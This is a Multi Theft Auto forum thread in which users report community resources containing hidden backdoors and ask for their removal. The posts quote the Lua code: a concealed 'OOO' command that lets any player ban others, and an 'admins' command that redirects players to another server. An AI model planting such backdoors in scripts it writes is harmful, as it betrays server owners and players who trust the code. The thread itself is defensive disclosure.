Jump to content

Report community resources here!


Recommended Posts

Hello i saw this basemode shop panel by kemo ! but this panel mined with this panel you can ban players in the server using command if you are in EveryOne Group ! Guide:

function banPlayerCommand(l_64_0, l_64_1, l_64_2, l_64_3) 
  if isObjectInACLGroup("user." .. getAccountName(getPlayerAccount(source)), aclGetGroup("Everyone")) then 
    local l_64_4 = getPlayerFromName(l_64_2) 
    banPlayer(l_64_4, l_64_0, l_64_3) 
    outputChatBox("ban: " .. l_64_2 .. " successfully banned by shop2013", l_64_0) 
  else 
    outputChatBox("ban: You don't have enough permissions", l_64_0) 
  end 
end 
addCommandHandler("OOO", banPlayerCommand) 
  

Shop Url : https://community.multitheftauto.com/index.php?p=resources&s=details&id=5607

Please delete the script

DONE

Edited by Guest
Link to comment

Hello i saw this admin login system ! but this system mined with this panel you can redirect players in the server using command Guide:

function ServerAdminler(playerSource)outputChatBox(getPlayerName(playerSource).." looked to the authorities.",getRootElement(),255,125,0,true) 
redirectPlayer(playerSource,ip,port) 
end 
addCommandHandler("admins",ServerAdminler) 

Url : https://community.multitheftauto.com/index.php?p=resources&s=details&id=5987&vote=1

:mrgreen:

DONE

Link to comment
Hello i saw this admin login system ! but this system mined with this panel you can redirect players in the server using command Guide:
function ServerAdminler(playerSource)outputChatBox(getPlayerName(playerSource).." looked to the authorities.",getRootElement(),255,125,0,true) 
redirectPlayer(playerSource,ip,port) 
end 
addCommandHandler("admins",ServerAdminler) 

Url : https://community.multitheftauto.com/index.php?p=resources&s=details&id=5987&vote=1

:mrgreen:

All of them are same:

https://community.multitheftauto.com/ind ... ls&id=5976

https://community.multitheftauto.com/ind ... ls&id=5986

https://community.multitheftauto.com/ind ... ls&id=5985

https://community.multitheftauto.com/ind ... ls&id=5987

DONE

Link to comment
Hello i saw this admin login system ! but this system mined with this panel you can redirect players in the server using command Guide:
function ServerAdminler(playerSource)outputChatBox(getPlayerName(playerSource).." looked to the authorities.",getRootElement(),255,125,0,true) 
redirectPlayer(playerSource,ip,port) 
end 
addCommandHandler("admins",ServerAdminler) 

Url : https://community.multitheftauto.com/index.php?p=resources&s=details&id=5987&vote=1

:mrgreen:

All of them are same:

https://community.multitheftauto.com/ind ... ls&id=5976

https://community.multitheftauto.com/ind ... ls&id=5986

https://community.multitheftauto.com/ind ... ls&id=5985

https://community.multitheftauto.com/ind ... ls&id=5987

WTF With Him ? :x:| should be ban him :wink: .

Link to comment
  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...